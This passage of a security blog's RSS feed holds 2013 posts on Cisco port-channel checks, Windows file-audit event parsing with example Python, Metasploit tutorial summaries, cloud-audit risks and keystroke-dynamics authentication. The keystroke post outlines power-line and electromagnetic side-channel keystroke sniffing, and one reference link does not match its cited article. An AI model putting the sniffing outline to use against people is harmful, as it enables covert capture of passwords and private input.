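    return interfaces

def members_of(interfaces, group):
    """{physical interface: channel mode} for every member of port-channel `group`."""
    members = {}
    for name, lines in interfaces.items():
        for m in filter(None, map(CHANNEL_RE.match, lines)):
            if int(m.group(1)) == group:
                members[name] = m.group(2)
    return members

def tracked(lines):
    return {l for l in lines if l.startswith(TRACKED)}

def check_one_end(config, group):
    """Problems on a single switch: missing Po, too few members, mixed channel
    modes, or a member whose trunk settings differ from the port-channel's."""
    interfaces = parse_interfaces(config)
    po = interfaces.get(f"Port-channel{group}")
    if po is None:
        return [f"Port-channel{group} is not defined"]
    members = members_of(interfaces, group)
    problems = []
    if len(members) < 2:
        problems.append(f"Port-channel{group} has {len(members)} member(s), expected at least 2")
    if len(set(members.values())) > 1:
        problems.append(f"members use mixed channel-group modes: {sorted(set(members.values()))}")
    for name in sorted(members):
        diff = tracked(po) ^ tracked(interfaces[name])
        if diff:
            problems.append(f"{name} does not match Port-channel{group}: {sorted(diff)}")
    return problems

def check_both_ends(local, remote, group):
    """Per-end problems plus cross-end mismatches in trunk settings and channel mode."""
    problems = [f"local: {p}" for p in check_one_end(local, group)]
    problems += [f"remote: {p}" for p in check_one_end(remote, group)]
    lifs, rifs = parse_interfaces(local), parse_interfaces(remote)
    lpo = tracked(lifs.get(f"Port-channel{group}", set()))
    rpo = tracked(rifs.get(f"Port-channel{group}", set()))
    if lpo != rpo:
        problems.append(f"port-channel settings differ between ends: {sorted(lpo ^ rpo)}")
    lmodes = set(members_of(lifs, group).values())
    rmodes = set(members_of(rifs, group).values())
    # 'on' bundles unconditionally, so it only works when the far end is 'on' too;
    # against a PAgP/LACP end the two switches disagree about what the links are.
    if lmodes != rmodes and ("on" in lmodes or "on" in rmodes):
        problems.append(f"channel modes differ between ends: {sorted(lmodes)} vs {sorted(rmodes)}")
    return problems

if __name__ == "__main__":
    for problem in check_both_ends(SW1_CONFIG, SW2_CONFIG, 1):
        print("PROBLEM:", problem)
```

<p style="text-align: left;">Feed it the interface sections of “show running-config” from each end; anything it prints is something to fix before the “no shutdown”.</p>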
<p style="text-align: left;">The next time you are tasked with building a network from the ground up or adding high-availability features to an existing one, keep these tips and configuration examples in mind. Failure points in any network are a matter of “when,” not “if.” The saying “even the best laid plans…” will come back to bite you if proper monitoring, countermeasures against link failure and electrical power protection are not built in.</p>
<h3>References for Cisco Fault Tolerant Network Design:</h3>
<p>Cisco Fault Tolerant Network Design [Review of Fault Tolerant Network Design, by C. Walters]. (2013, March). Retrieved from Hakin9 website: <a title="http://hakin9.org/how-to-detect-system-intrusions/" href="http://hakin9.org/how-to-detect-system-intrusions/" target="_blank">http://hakin9.org/how-to-detect-system-intrusions/</a></p>
<p>The post <a href="https://www.mafiasecurity.com/network/cisco-fault-tolerant-network-design/">Cisco Fault Tolerant Network Design</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></content:encoded>
			<wfw:commentRss>https://www.mafiasecurity.com/network/cisco-fault-tolerant-network-design/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows Security Auditing for File Integrity Monitoring</title>
		<link>https://www.mafiasecurity.com/governance/windows-security-auditing-for-file-integrity-monitoring/</link>
		<comments>https://www.mafiasecurity.com/governance/windows-security-auditing-for-file-integrity-monitoring/#comments</comments>
		<pubDate>Wed, 27 Mar 2013 18:59:07 +0000</pubDate>
		<dc:creator>Troy Wilkinson</dc:creator>
				<category><![CDATA[Governance]]></category>
		<category><![CDATA[Installations / Guides]]></category>
		<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Logging]]></category>
		<category><![CDATA[Risk Management]]></category>
		<category><![CDATA[Windows Server]]></category>

		<guid isPermaLink="false">https://www.mafiasecurity.com/?p=1589</guid>
		<description><![CDATA[<p>Recently, my company found out that our current file monitoring software was being deprecated. After researching many expensive options, we found the Windows built-in file integrity monitor would suit our needs for Windows Security Auditing. First, there are both pros and cons with using Windows security auditing. One of the benefits of Windows security auditing ...</p><p>The post <a href="https://www.mafiasecurity.com/governance/windows-security-auditing-for-file-integrity-monitoring/">Windows Security Auditing for File Integrity Monitoring</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>Recently, my company found out that our current file monitoring software was being deprecated. After researching many expensive options, we found the Windows built-in file integrity monitor would suit our needs for Windows Security Auditing.</p>
<p>First, there are both pros and cons with using Windows security auditing.</p>
<p>One benefit of Windows security auditing over third-party software is that it can tell the system administrator when a user tries to access a file they are not authorized for. John Doe from marketing may ‘accidentally’ try to open a Human Resources share once; if it happens repeatedly, with different credentials or circumstances, you can suspect John Doe is doing something he should not be.</p>
<p>The first big downside is that it cannot tell you what changed inside a file. The more expensive options, such as nCircle and Tripwire, show you exactly what changed, down to a granular level. The second is that, configured improperly, the server’s Security event log becomes too large to parse, and you lose the ability to make sense of the audit trail.</p>
<p>Windows security auditing gives IT professionals and IT auditors a record of which directories and files, executables included, have been created, modified or deleted, and it tells you who, what, where and when.</p>
<p>You will need some way to monitor your event logs. We use Splunk (<a href="http://www.splunk.com/">www.splunk.com</a>) to parse and alert on our application, security and system event logs. All we had to do was enable Windows security auditing and configure it on the appropriate folder structure. From day one we were getting the information we needed, and we met and exceeded the PCI DSS requirements we had to satisfy to stay compliant.</p>
<p>Windows security auditing is not enabled by default; however, it is very simple to set up.</p>
<p>On your Windows server, go to Local Security Policy &gt; Security Settings &gt; Local Policies &gt; Audit Policy and set “Audit object access” to audit both Success and Failure. Turning this on logs nothing by itself; it only allows the per-folder audit entries below to take effect.</p>
<p>Then right-click the file or folder you want to monitor and select Properties &gt; Security tab &gt; Advanced &gt; Auditing tab &gt; Edit. Add an auditing entry for the principal you care about (Everyone, for integrity monitoring) and tick the accesses you want recorded.</p>
<p>I would advise experimenting with a small set of files and folders while watching the Security event log. You will see the different access notifications for the file set you selected, and you will quickly get a feel for how much volume a given set of audit entries generates.</p>
<p>Most importantly, monitor for the following events:</p>
<ul>
<li>Successful:
<ul>
<li>Create files / write data</li>
<li>Create folders / append data</li>
<li>Write attributes</li>
<li>Write extended attributes</li>
<li>Delete subfolders and files</li>
<li>Delete</li>
</ul>
</li>
<li>Failed:
<ul>
<li><em>All failed attempts to access monitored files and folders</em></li>
</ul>
</li>
</ul>
<p><i>This is useful for spotting employees who routinely try to open files and folders they do not have permission to view.</i></p>
<p>There are some important event IDs associated with Windows security auditing. The most important are:</p>
<ul>
<li>Event ID 4656 – A handle to an object was requested. This is logged when a process opens the file and it lists the accesses that were asked for; a failure audit here is the record of a denied attempt.</li>
<li>Event ID 4663 – An attempt was made to access an object. This is the event that tells you a file or folder was created, written to or deleted: the Accesses field names the right that was exercised (for example WriteData or DELETE) and the event includes the process that did it.</li>
<li>Event ID 4660 – An object was deleted. It does not carry the file name, so match its Handle ID to the preceding 4663 for the same handle to see what was deleted.</li>
</ul>
<p>A list of more Windows security auditing event IDs can be found here: <a href="http://support.microsoft.com/kb/947226">http://support.microsoft.com/kb/947226</a></p>
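<p>To see how the Successful/Failed entries above and these event IDs turn into a who/what/where/when record, here is an added example (not part of the original article, and not how Splunk does it) that parses Security-log events in the XML form that “wevtutil qe Security /f:xml” exports. The four events are constructed, with invented host, user and file names; the access-mask bits are the real ones behind the six audit entries listed above, and the script keeps only successful writes or deletes (4663) and denied attempts (audit-failure events), which is the filtering that keeps the log readable:</p>

```python
"""Turn Windows file-system audit events (4663 / 4656) into change and
denied-access records: who, what, where, when. Added example, not from the
original article. The events are constructed to follow the schema that
'wevtutil qe Security /f:xml' exports; host, users and paths are invented."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# File access-right bits carried in the AccessMask field, named as they appear
# on a folder's Auditing tab. These are the six "Successful" entries recommended above.
ACCESS_BITS = {
    0x00002: "Create files / write data",
    0x00004: "Create folders / append data",
    0x00010: "Write extended attributes",
    0x00040: "Delete subfolders and files",
    0x00100: "Write attributes",
    0x10000: "Delete",
}
AUDIT_SUCCESS = 0x8020000000000000   # System/Keywords value of an audit-success event
AUDIT_FAILURE = 0x8010000000000000   # ... and of an audit-failure event

EVENT_TMPL = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>{eid}</EventID><Keywords>{kw}</Keywords>
  <TimeCreated SystemTime="{when}"/><Computer>FILESRV01.example.local</Computer></System>
 <EventData><Data Name="SubjectUserName">{user}</Data><Data Name="SubjectDomainName">EXAMPLE</Data>
  <Data Name="ObjectType">File</Data><Data Name="ObjectName">{obj}</Data>
  <Data Name="AccessMask">{mask}</Data><Data Name="ProcessName">{proc}</Data></EventData>
</Event>
"""

def constructed_event(eid, kw, when, user, obj, mask, proc):
    """Render one constructed event from the template (only the fields we parse)."""
    return EVENT_TMPL.format(eid=eid, kw=kw, when=when, user=user, obj=obj, mask=mask, proc=proc)

# Four constructed events: a write to a program file, a plain read (noise),
# a denied open of an HR spreadsheet, and a log deletion.
SAMPLE_EVENTS = "<Events>" + "".join([
    constructed_event(4663, "0x8020000000000000", "2013-03-27T18:59:07Z", "jdoe",
                      r"C:\Program Files\App\app.exe", "0x2", r"C:\Windows\explorer.exe"),
    constructed_event(4663, "0x8020000000000000", "2013-03-27T19:02:11Z", "svc_backup",
                      r"D:\Logs\app.log", "0x1", r"C:\Program Files\Backup\agent.exe"),
    constructed_event(4656, "0x8010000000000000", "2013-03-27T19:05:40Z", "jdoe",
                      r"C:\HR\salaries.xlsx", "0x1", r"C:\Windows\explorer.exe"),
    constructed_event(4663, "0x8020000000000000", "2013-03-27T19:10:03Z", "Administrator",
                      r"D:\Logs\old.log", "0x10000", r"C:\Windows\System32\cmd.exe"),
]) + "</Events>"

def decode_mask(mask):
    """Names of the write/delete rights present in an AccessMask such as 0x10002."""
    return [name for bit, name in sorted(ACCESS_BITS.items()) if mask & bit]

def parse_events(xml_text):
    """Yield one record per 4656/4663 event with who, what, where, when and outcome."""
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        system = ev.find("e:System", NS)
        event_id = int(system.find("e:EventID", NS).text)
        if event_id not in (4656, 4663):
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.find("e:EventData", NS)}
        yield {
            "event_id": event_id,
            "when": system.find("e:TimeCreated", NS).get("SystemTime"),
            "where": system.find("e:Computer", NS).text,
            "who": data["SubjectDomainName"] + "\\" + data["SubjectUserName"],
            "what": data["ObjectName"],
            "process": data["ProcessName"],
            "rights": decode_mask(int(data.get("AccessMask", "0x0"), 16)),
            "success": int(system.find("e:Keywords", NS).text, 16) == AUDIT_SUCCESS,
        }

def classify(events):
    """Split records into confirmed changes (successful 4663 carrying a write or
    delete right) and denied attempts (any audit-failure event). Successful reads
    are dropped; that is what keeps the log from drowning the real changes."""
    changes, denied = [], []
    for e in events:
        if not e["success"]:
            denied.append(e)
        elif e["event_id"] == 4663 and e["rights"]:
            changes.append(e)
    return changes, denied

def report(xml_text):
    """One line per interesting event, in the who/what/where/when form the article wants."""
    changes, denied = classify(parse_events(xml_text))
    lines = [f'{e["when"]} CHANGE {e["who"]} {e["what"]} on {e["where"]} '
             f'[{", ".join(e["rights"])}] via {e["process"]}' for e in changes]
    lines += [f'{e["when"]} DENIED {e["who"]} {e["what"]} on {e["where"]} via {e["process"]}'
              for e in denied]
    return lines

if __name__ == "__main__":
    print("\n".join(report(SAMPLE_EVENTS)))
```

<p>Event 4660 is left out on purpose: it has no object name, so on its own it cannot tell you what was deleted; the 4663 carrying the Delete right already does.</p>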
<p>As an example, you could use Windows security auditing on the following folders.</p>
<p>(This is not an all-inclusive list)</p>
<ul>
<li>C:\Bin\*</li>
<li>C:\Users\*</li>
<li>C:\Program Files\*</li>
<li>C:\Program Files (x86)\</li>
<li>C:\Windows\System32\dns\*</li>
<li>C:\Windows\System32\*.exe</li>
<li>C:\Windows\Security</li>
<li>D:\Program Files\*</li>
<li>D:\Logs\*</li>
</ul>
<p>The auditing settings can be built into Group Policy Objects and pushed out as part of your domain policy; the folder-level audit entries themselves can be set under Computer Configuration &gt; Windows Settings &gt; Security Settings &gt; File System. Group Policy together with the Microsoft Deployment Toolkit is a great combination for ensuring your security auditing settings are applied consistently.</p>
<p>There are benefits to spending the money for software like Tripwire or nCircle, but take a look at Windows security auditing. You may just have your solution built into your server.</p>
<p>The post <a href="https://www.mafiasecurity.com/governance/windows-security-auditing-for-file-integrity-monitoring/">Windows Security Auditing for File Integrity Monitoring</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></content:encoded>
			<wfw:commentRss>https://www.mafiasecurity.com/governance/windows-security-auditing-for-file-integrity-monitoring/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Step by Step Metasploit Free Tutorials</title>
		<link>https://www.mafiasecurity.com/install-guides/step-by-step-metasploit-free-tutorials/</link>
		<comments>https://www.mafiasecurity.com/install-guides/step-by-step-metasploit-free-tutorials/#comments</comments>
		<pubDate>Mon, 18 Mar 2013 21:10:46 +0000</pubDate>
		<dc:creator>Affiliate</dc:creator>
				<category><![CDATA[Installations / Guides]]></category>
		<category><![CDATA[Affiliate]]></category>
		<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Attack Vector]]></category>
		<category><![CDATA[Black Hat]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[White Hat]]></category>

		<guid isPermaLink="false">https://www.mafiasecurity.com/?p=1575</guid>
		<description><![CDATA[<p>Hakin9 is a magazine about the best technical solutions and latest trends in IT security and insecurity. We wish to make this knowledge accessible to everyone, whether they are professionals or hobbyists. The articles we publish are written by specialists who put theory into practice and show how to gain hakin9 skills.  - This affiliate has offered step ...</p><p>The post <a href="https://www.mafiasecurity.com/install-guides/step-by-step-metasploit-free-tutorials/">Step by Step Metasploit Free Tutorials</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></description>
				<content:encoded><![CDATA[<p><strong>Hakin9</strong> is a magazine about the best technical solutions and latest trends in IT security and insecurity. We wish to make this knowledge accessible to everyone, whether they are professionals or hobbyists. The articles we publish are written by specialists who put theory into practice and show how to gain hakin9 skills.  - This affiliate has offered step by step Metasploit free tutorials for Mafia Security.</p>
<p>Would you like to be featured in one of these Hakin9 releases and be seen by over 100,000 readers? <a title="Mafia Security Information Security Author" href="https://www.mafiasecurity.com/information-security-author-position/" target="_blank">Become a Mafia Security Author to find out more</a>!</p>
<p>DEFENSE PATTERN<br />
<strong>How to Use Metasploit for Security Defense<br />
</strong><em>By Justin C. Klein Keane, an Information Security Specialist working at the University of Pennsylvania<br />
</em>If you&#8217;ve ever taken any training about penetration testing, or read almost any book or online article about the trade, you&#8217;ve heard of Metasploit. Years ago, before penetration testing was a recognized professional field, exploiting a vulnerability was often an extremely onerous task. Identifying a vulnerability might be as easy as fingerprinting a system then searching public mailing lists, but finding exploit code was often difficult.</p>
<p><strong>How to Work with Metasploit Auxiliary Modules<br />
</strong><em>By Abhinav Singh</em>, <i>the author of “Metasploit penetration testing cookbook,” a contributor of SecurityXploded community<br />
</i>The Metasploit framework is based on a modular architecture. This means that all the exploits, payloads, encoders etc are present in the form of modules. The biggest advantage of a modular architecture is that it is easier to extend the functionality of the framework based on requirement. Any programmer can develop his own module and port it easily into the framework.</p>
<p><strong>How to Explore the IPv6 Attack Surface with Metasploit<br />
</strong><em>By Mike Sheward, a security specialist for a software-as-a-service provider based in Seattle<br />
</em>IPv6 is often described as a parallel universe, co-existing alongside existing IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could provide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.</p>
<p>HAKIN9 EXTRA<br />
<strong>How to Use The Mac OS X Hackers Toolbox</strong><br />
<em>By Phillip Wylie, CISSP, IAM</em><br />
When you think of an operating system to run pen testing tools on, you probably think of Linux, and more specifically BackTrack Linux. BackTrack Linux is a great option and one of the most common platforms for running pen testing tools. If you are a Mac user, you would most likely run a virtual machine of BackTrack Linux. While this is a great option, sometimes it is nice to have your tools running on the native operating system of your computer.</p>
<p>NETWORK SCANNING<br />
<strong>How to Scan with Nessus from within Metasploit<br />
</strong><em>By Michael Boman, a penetration tester, delivering courses in security testing and secure development<br />
</em>When you perform a penetration test with Metasploit you sometimes import vulnerability scanning results for example Nessus Vulnerability Scanner. Usually you start the scan externally from Metasploit framework and then import the results into Metasploit. What you can do is to manage the Nessus scan from within Metasploit and easily import the results into your process. But let’s start from the beginning.</p>
<p><strong>How to Use Multiplayer Metasploit with Armitage<br />
</strong><em>By Michael Boman, a penetration tester, delivering courses in security testing and secure development<br />
</em>Metasploit is a very cool tool to use in your penetration testing: add Armitage for a really good time. Penetration test engagements are more and more often a collaborative effort with teams of talented security practitioners rather than a solo effort.<br />
<em>Armitage is a scriptable red team (that is what the offensive security teams are called) collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.</em></p>
<p>EXPLORING DATABASE<br />
<strong>How to use Sqlploit</strong><br />
<em>By George Karpouzas, co-founder of WEBNETSOFT, a software development and IT Services company specialized in application security</em><br />
Databases nowadays are everywhere, from the smallest desktop applications to the largest web sites such as Facebook. Critical business information is stored in database servers that are often poorly secured. Someone with access to this information could have control over a company’s or an organization’s infrastructure.</p>
<h4 style="text-align: center;"><a title="Metasploit Open Tutorials Free Download" href="http://www.hakin9.org/metasploit-open-tutorials-free-download/" target="_blank">http://www.hakin9.org/metasploit-open-tutorials-free-download/</a></h4>
<p>The post <a href="https://www.mafiasecurity.com/install-guides/step-by-step-metasploit-free-tutorials/">Step by Step Metasploit Free Tutorials</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></content:encoded>
			<wfw:commentRss>https://www.mafiasecurity.com/install-guides/step-by-step-metasploit-free-tutorials/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Auditing Cloud Computing</title>
		<link>https://www.mafiasecurity.com/governance/auditing-cloud-computing/</link>
		<comments>https://www.mafiasecurity.com/governance/auditing-cloud-computing/#comments</comments>
		<pubDate>Wed, 13 Mar 2013 17:20:10 +0000</pubDate>
		<dc:creator>Anthony Giallombardo</dc:creator>
				<category><![CDATA[Governance]]></category>
		<category><![CDATA[Department of Defense]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Risk Management]]></category>
		<category><![CDATA[User Awareness]]></category>

		<guid isPermaLink="false">https://www.mafiasecurity.com/?p=1570</guid>
		<description><![CDATA[<p>Before diving into the auditing cloud computing let us first look at what it is. Cloud computing has many different defections; however, since 2009 cloud computing became a popular buzzword as a new way to conduct IT business.  As a metaphor for the Internet, &#8220;the cloud&#8221; is a familiar cliché, but when combined with &#8220;computing,&#8221; ...</p><p>The post <a href="https://www.mafiasecurity.com/governance/auditing-cloud-computing/">Auditing Cloud Computing</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></description>
<content:encoded><![CDATA[<p>Before diving into auditing cloud computing, let us first look at what it is. Cloud computing has many different definitions; since 2009 it has become a popular buzzword for a new way to conduct IT business. As a metaphor for the Internet, &#8220;the cloud&#8221; is a familiar cliché, but when combined with &#8220;computing,&#8221; the meaning gets bigger and fuzzier (Knorr &amp; Gruman, 2009). Some analysts and vendors define cloud computing narrowly as an updated version of utility computing: virtual servers available over the Internet (Knorr &amp; Gruman, 2009). Others go very broad, arguing anything you consume outside the firewall is &#8220;in the cloud,&#8221; including conventional outsourcing (Knorr &amp; Gruman, 2009). Many would argue that something as simple as web hosting through a third party such as GoDaddy or LiquidWeb counts as cloud computing, since your information, or your point of business, is in the ‘cloud.’ I would not go that far; I would only consider Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS) true cloud computing.</p>
<p>Cloud computing comes into focus only when you think about what IT always needs: a way to increase capacity or add capabilities on the fly without investing in new infrastructure, training new personnel, or licensing new software (Knorr &amp; Gruman, 2009). Cloud computing encompasses any subscription-based or pay-per-use service that, in real time over the Internet, extends IT&#8217;s existing capabilities (Knorr &amp; Gruman, 2009).</p>
<p>Salesforce.com is by far the best-known SaaS example among enterprise applications, but HR and ERP applications are also delivered this way, by players such as Workday (Knorr &amp; Gruman, 2009). Closely related to SaaS, web service providers offer APIs that let developers exploit functionality over the Internet rather than delivering full-blown applications (Knorr &amp; Gruman, 2009). Examples are the full range of APIs offered by Google Maps, ADP payroll processing, the U.S. Postal Service, Bloomberg, and even conventional credit card processing services (Knorr &amp; Gruman, 2009).</p>
<p>PaaS, a variation on SaaS, delivers development environments as a service (Knorr &amp; Gruman, 2009). You build your own applications on the provider&#8217;s infrastructure, and your users reach them over the Internet on the provider&#8217;s servers (Knorr &amp; Gruman, 2009). Like Legos, these services are constrained by the vendor&#8217;s design and capabilities, so you do not get complete freedom, but you do get predictability and pre-integration (Knorr &amp; Gruman, 2009).</p>
<h4>Positives of Auditing Cloud Computing:</h4>
<p>Randi Levin, CTO of the City of Los Angeles, praises the ability to go cloud-based (Kaplan, 2010). Like most of the country, Los Angeles’ wallet is very strapped, and even emergency services are facing cuts (Kaplan, 2010).</p>
<p>The IT department is no different, having lost almost 33 percent of its annual budget and 38 of its employees (Kaplan, 2010). What made Levin look into cloud computing was the need for a faster, more efficient email service (Kaplan, 2010). Not to mention that the data center would need $30 million of renovation to meet current standards and sits 20 stories below a car wash, with flooding a major concern (Kaplan, 2010).</p>
<p>The implementation would save Los Angeles about $6 million over the next five years; however, speculation about the security and privacy of emails remains (Kaplan, 2010). Levin’s answer to the skeptics: “when you look at companies like Google and Microsoft, they have 500 or 600 security specialists that all they do is live and eat and breathe this” (Kaplan, 2010). What matters when dealing with cloud computing is the service-level agreement, which is where you ensure that confidentiality, integrity and availability (the C.I.A. model) are upheld (Kaplan, 2010).</p>
<h4>Negatives of Auditing Cloud Computing:</h4>
<p>With the City of LA, there were some disbelievers, pointing out some interesting issues regarding government involvement with these corporations. When Google was compromised by alleged Chinese hackers, they had “enlisted” the NSA to investigate the issue granting them access to their network (Nakashima, 2010). The NSA is famous for their warrantless wiretaps and surveillance programs on foreign and domestic criminals (Nakashima, 2010). This gives people good reason to question if ‘big brother’ could or would snoop around any corporate, or in this article, city officials’ emails.</p>
<p>The biggest concerns about cloud computing are security and privacy. Users might not be comfortable handing over their data to a third party (Ahluwalia, n.d.). This is an even greater concern when it comes to companies that wish to keep their sensitive information on cloud servers (Ahluwalia, n.d.). While most service vendors would ensure that their servers are kept free from viral infection and malware, it is still a concern considering the fact that a number of users from around the world are accessing the server (Ahluwalia, n.d.).</p>
<p>Privacy is another issue with cloud servers (Ahluwalia, n.d.). Ensuring that a client’s data is not accessed by any unauthorized users is of great importance for any cloud service (Ahluwalia, n.d.). To make their servers more secure, cloud service vendors have developed password protected accounts, security servers through which all data being transferred must pass and data encryption techniques (Ahluwalia, n.d.). After all, the success of a cloud service depends on its reputation, and any sign of a security breach would result in a loss of clients and business (Ahluwalia, n.d.).</p>
<p>Unlike a bank robbery, where few customers are affected and the money is guaranteed to be covered, a breach of intellectual property cannot be undone. I believe the only real way to pick a ‘trusted’ provider is to look at the controls it has in place for its own internal auditing, and as the number of controls goes up, so will the price of the service.</p>
<h4>Effect on IT Auditing Cloud Computing:</h4>
<p>One of the main purposes of an internal audit is to find mistakes within your business, not to point fingers but to reach the common goal of the overall business’s success. Whether you choose IaaS, PaaS, or SaaS, you are leaving the controls in the hands of another company, which may not have your company’s best interests in mind.</p>
<p>In addition, some of the audit processes may not be able to be completed simply because your company does not, and should not, have the necessary access to the overall infrastructure to be able to run the tests. If they allowed you full access, I would be worried about the type of attacks another entity could do on the network against my own company.</p>
<p>Amid all the negatives, there is one way a cloud option makes internal auditing easier: controls you no longer operate, such as the physical data center and the underlying infrastructure, are covered by the provider’s own audits rather than yours. Be careful with the conclusion, though. Choosing a cloud provider does not remove your organization’s SOX or PCI DSS obligations; it changes who operates some of the controls, and you still have to show that they are in place.</p>
<h4>References of Auditing Cloud Computing</h4>
<p>Ahluwalia, S. (n.d.). <i>Top 5 Disadvantages Of Cloud Computing</i>. Retrieved from <a href="http://www.cloudcomputingtechie.com/top-5-disadvantages/" target="_blank">http://www.cloudcomputingtechie.com/top-5-disadvantages/</a></p>
<p>Kaplan, D. (2010). Parting clouds: Los Angeles sees benefits moving some IT operations to the cloud. <i>SC Magazine</i>.</p>
<p>Knorr, E., &amp; Gruman, G. (2009, December 23). <i>What cloud computing really means</i>. Retrieved from <a href="http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031" target="_blank">http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031</a></p>
<p>Managing Risk on the Journey to Virtualization and the Cloud. (2010, August). <i>Enterprise Management Associates</i>.</p>
<p>Nakashima, E. (2010, February 4). Google to enlist NSA to help it ward off cyberattacks. <i>The Washington Post</i>. Retrieved from <a href="http://www.washingtonpost.com/wp-dyn/content/article/2010/02/03/AR2010020304057.html" target="_blank">http://www.washingtonpost.com/wp-dyn/content/article/2010/02/03/AR2010020304057.html</a></p>
<p>The post <a href="https://www.mafiasecurity.com/governance/auditing-cloud-computing/">Auditing Cloud Computing</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></content:encoded>
			<wfw:commentRss>https://www.mafiasecurity.com/governance/auditing-cloud-computing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Keystroke Dynamics Software</title>
		<link>https://www.mafiasecurity.com/access-control/keystroke-dynamics/</link>
		<comments>https://www.mafiasecurity.com/access-control/keystroke-dynamics/#comments</comments>
		<pubDate>Sat, 09 Mar 2013 14:39:29 +0000</pubDate>
		<dc:creator>Kimberly Kopytko</dc:creator>
				<category><![CDATA[Access Control]]></category>
		<category><![CDATA[Biometrics]]></category>
		<category><![CDATA[Password Security]]></category>
		<category><![CDATA[Security Software]]></category>

		<guid isPermaLink="false">https://www.mafiasecurity.com/?p=1555</guid>
		<description><![CDATA[<p>Passwords are the most common form of identification, they are also the weakest. In today’s age, strong authentication is becoming increasingly important. There are a number of alternative authentication methods that have been around for a while, such as voice recognition, fingerprinting, and retinal scanning. There are also new technologies hitting the market as well, ...</p><p>The post <a href="https://www.mafiasecurity.com/access-control/keystroke-dynamics/">Keystroke Dynamics Software</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></description>
<content:encoded><![CDATA[<p>Passwords are the most common form of authentication; they are also the weakest. Strong authentication is becoming increasingly important. A number of alternative authentication methods have been around for a while, such as voice recognition, fingerprinting and retinal scanning, and new technologies are hitting the market as well; one of them is Deepnet Security’s TypeSense keystroke dynamics software.</p>
<p>TypeSense is an authentication solution based on typeprint recognition: it uses keystroke dynamics to identify a user by the way they type characters on a keyboard. Keystroke dynamics extracts the distinctive characteristics of typed sequences of characters and builds a statistically unique signature from a person’s typing patterns. The features are the time each key is held down and the time that elapses between successive keystrokes. The software runs in the background, constantly monitors your keystrokes, learns your style, and can detect if your computer has been hijacked. (Deepnet Security)</p>
<p>TypeSense, and other similar products, do not do away with the need for passwords but instead protects them. This is a two-phase authentication method. There are a number of benefits to using keystroke dynamics technology. It’s relatively user-friendly and low-cost. It’s mobile and can be used to access your online accounts from anywhere and can be easily integrated in your existing authentication infrastructure.</p>
<p>One of the major downsides to this technology is that your typing style can vary greatly throughout the day depending on whether you are tired, distracted, angry, medicated, or in any number of other circumstances. These variations can cause the software to make false-positive or false-negative errors.</p>
<p>Although it requires a higher level of skill, keystrokes can be hacked. At DEF CON 17, Andrea Barisani and Daniele Bianco demonstrated how to sniff keystrokes using unconventional side-channel attacks. Wires in PS/2 keyboards leak information from the data wire into the ground wire, which acts like an antenna. The leaked information about the keystrokes can be detected on the power outlet, as well as on other wires on the same electrical system. By slicing open one of these lines, cutting the ground wire and attaching a probe, the line can be monitored and the signal isolated by filtering out the noise using software such as Scilab. The waveforms from the oscilloscope and the data can be streamed to the hacker’s computer, where additional software is used to extract the victim’s keystroke information.</p>
<p>A research team at Ecole Polytechnique Federale de Lausanne was able to pick up the electromagnetic radiation that is generated every time a key on a computer keyboard is tapped. Using an oscilloscope and an inexpensive wireless antenna, the team was able to pick up keystrokes from virtually any keyboard, including laptops, with 95 percent accuracy. (PC World, 2013)</p>
<p>Although no security measure can ever be flawless, hacking keystrokes is more challenging than simply stealing a password, so keystroke dynamics can slow or stop many hackers and has so far proven to be a quite effective method of securing passwords.</p>
<h4>References for Keystroke Dynamics:</h4>
<p>&#8220;DualShield Authentication : Keystroke Dynamics.&#8221; <i>Two Factor Authentication | 2 FA | 2 Factor Authentication</i>. Deepnet Security, n.d. Web. 19 Dec. 2012. &lt;<a href="http://www.deepnetsecurity.com/tokens/bio/typesense/">http://www.deepnetsecurity.com/tokens/bio/typesense/</a>&gt;.</p>
<p>DEFCON 17: Sniff Keystrokes With Lasers/Voltmeters &#8211; YouTube. <i>YouTube</i>. N.p., n.d. Web. 19 Dec. 2012. &lt;http://www.youtube.com/watch?v=xKSq9efXmh8&gt;.</p>
<p>McMillan, Robert. &#8220;A Way to Sniff Keystrokes From Thin Air | PCWorld.&#8221; <i>PCWorld &#8211; News, tips and reviews from the experts on PCs, Windows, and more</i>. N.p., 12 Mar. 2009. Web. 8 Mar. 2013. &lt;<a href="http://www.pcworld.com/article/161166/article.html">http://www.pcworld.com/article/161166/article.html</a>&gt;.</p>
<p>The post <a href="https://www.mafiasecurity.com/access-control/keystroke-dynamics/">Keystroke Dynamics Software</a> appeared first on <a href="https://www.mafiasecurity.com">Mafia Security</a>.</p>]]></content:encoded>
